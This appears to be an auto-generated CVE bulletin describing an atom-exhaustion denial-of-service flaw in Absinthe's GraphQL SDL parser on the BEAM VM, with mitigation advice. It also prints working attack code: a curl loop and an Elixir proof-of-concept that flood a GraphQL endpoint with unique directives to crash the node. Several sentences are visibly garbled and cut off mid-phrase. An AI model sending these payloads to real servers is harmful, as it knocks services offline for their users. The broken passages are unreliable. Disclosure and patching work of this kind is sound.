Listen to this Post
How the CVE works (technical details):
The vulnerability resides in Absinthe’s GraphQL SDL parsing pipeline. When a `directive @@atomdos_1, @atomdos_2, …). Each unique name permanently consumes one atom table slot. By sending one or a few HTTP requests with ~1M unique directives, the atom table fills up, causing the entire Erlang node to crash. The same unsafe conversion appears in multiple other definition types (enum, field, input object, input value, interface, object, scalar, union). Any code path that passes untrusted GraphQL SDL to `Absinthe.Phase.Parse` or `Absinthe.Blueprint.Draft.convert/2` is vulnerable – including schema upload endpoints, federation gateways, introspection converters, and any developer tool parsing user‑supplied documents. No authentication or query execution is required; merely reaching the parser triggers the exhaustion.
dailycve form:
Platform: BEAM VM
Version: 1.7.0 onward
Vulnerability : Atom exhaustion DoS
Severity: Critical
Date: 2026-05-14
Prediction: Expect patch soon
What Undercode Say:
Analytics – bash commands and codes:
Monitor atom count on a running BEAM node
echo "erlang:system_info(atom_count)." | iex --eval
Simulate attack with curl (sends 1000 unique directives)
curl -X POST http://target:41731/graphql \
-H "Content-Type: application/graphql" \
--data-binary "$(for i in {1..1000}; do echo "directive @x${RANDOM}_${i} on FIELD"; done); query { hello }"
Elixir proof‑of‑concept (abridged from ):
n = 5000
directives = 1..n |> Enum.map_join("\n", fn i -> "directive @a{i} on FIELD" end)
document = directives <> "\nquery { hello }"
Req.post!("http://127.0.0.1:41731/graphql", body: document)
Exploit:
Craft a GraphQL SDL document containing 1,048,576 unique `directive @/graphql). The VM atom table fills → BEAM crash → full denial of service.
Protection from this CVE:
- Upgrade Absinthe to a patched version (once available) that uses `String.to_existing_atom/1` and validates directive names against known schema before atom creation.
- If no patch exists, deploy a reverse proxy that drops requests containing `directive @` with high repetition (though not foolproof).
- Isolate untrusted SDL parsing into separate, disposable BEAM nodes.
- Monitor atom count and restart nodes proactively.
Impact:
Unauthenticated remote DoS leading to complete BEAM VM crash. All workloads sharing the node are taken down. No special privileges or prior knowledge required – only the ability to send HTTP POST requests to the SDL parser endpoint.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

